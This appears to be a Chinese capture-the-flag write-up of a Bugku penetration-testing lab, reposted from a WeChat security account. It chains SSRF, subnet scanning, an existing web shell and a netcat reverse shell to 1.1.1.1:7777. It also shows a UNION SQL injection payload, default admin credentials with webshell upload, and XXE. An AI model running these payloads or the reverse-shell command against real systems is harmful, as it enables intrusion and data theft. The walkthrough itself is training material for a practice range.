外网
题目给了一个登录框,用于获取站点快照,存在SSRF,直接读flag
访问host文件,得到本机ip
对192.168.0/24网段爆破,爆破结果如下
192.168.0.10
其中192.168.0.10是被黑的网页:
盲猜shell.php
直接读根目录flag即可:
-
http://192.168.0.10/shell.php?cmd=cat /f*
发现当前目录也存在一个flag
直接读即可
题目存在nc
使用nc弹shell,注意不存在bash,要用sh
http://192.168.0.10/shell.php?cmd=nc 1.1.1.1 7777 -e /bin/sh
192.168.0.138
内网探测到192.168.0.138,存在联合注入,payload如下
http://192.168.0.138?id=100%20union%20select%201,2,3,(select%20*%20from%20bugku_sql.flag)--+
10.10.0.22
由于fscan出了点问题,写了个python脚本跑了一下10.10.0/24网段:
import requests
for i in range(1,256):
url = "http://10.10.0." + str(i)
try:
r = requests.get(url)
except:
continue
else:
if r.status_code == 200:
print(url)
还存在10.10.0.22这台机子
访问后台admin.php,账号密码都是admin 后台有一个文件上传的功能,没有过滤,直接上传一句话木马连接即可:
同样也是存在两个flag 一个在网站目录
一个在根目录
192.168.0.250
内网192.168.0.250是一个登录页面
存在xxe漏洞 直接读flag接口
根据前一题的经验,在/var/www/html下可能还存在一个flag
本文章仅用于信息安全技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循法律法规。
未经作者允许,严禁转载 如有转载:请在公众号下留言
原文始发于微信公众号(7coinSec):Bugku 渗透测试3 通关详解
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论